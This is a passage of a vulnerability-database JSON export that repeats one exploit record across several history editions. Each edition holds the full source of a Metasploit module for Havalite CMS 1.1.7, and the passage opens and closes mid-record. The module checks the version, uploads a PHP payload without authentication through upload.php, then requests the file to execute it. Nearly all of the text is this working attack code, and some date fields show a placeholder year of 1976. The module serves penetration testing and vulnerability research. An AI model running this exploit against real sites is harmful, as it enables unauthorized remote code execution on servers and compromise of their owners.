['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-26T03:51:29", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-26T07:49:23", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-26T07:49:23", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-26T07:49:23", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-26T11:53:13", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-26T11:53:13", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-26T11:53:13", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-27T03:50:38", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-27T03:50:38", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-27T03:50:38", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-21T16:35:37", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-27T03:50:38", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-04-21T16:35:37", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-21T22:33:38", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-04-21T22:33:38", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-07T14:59:01", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": 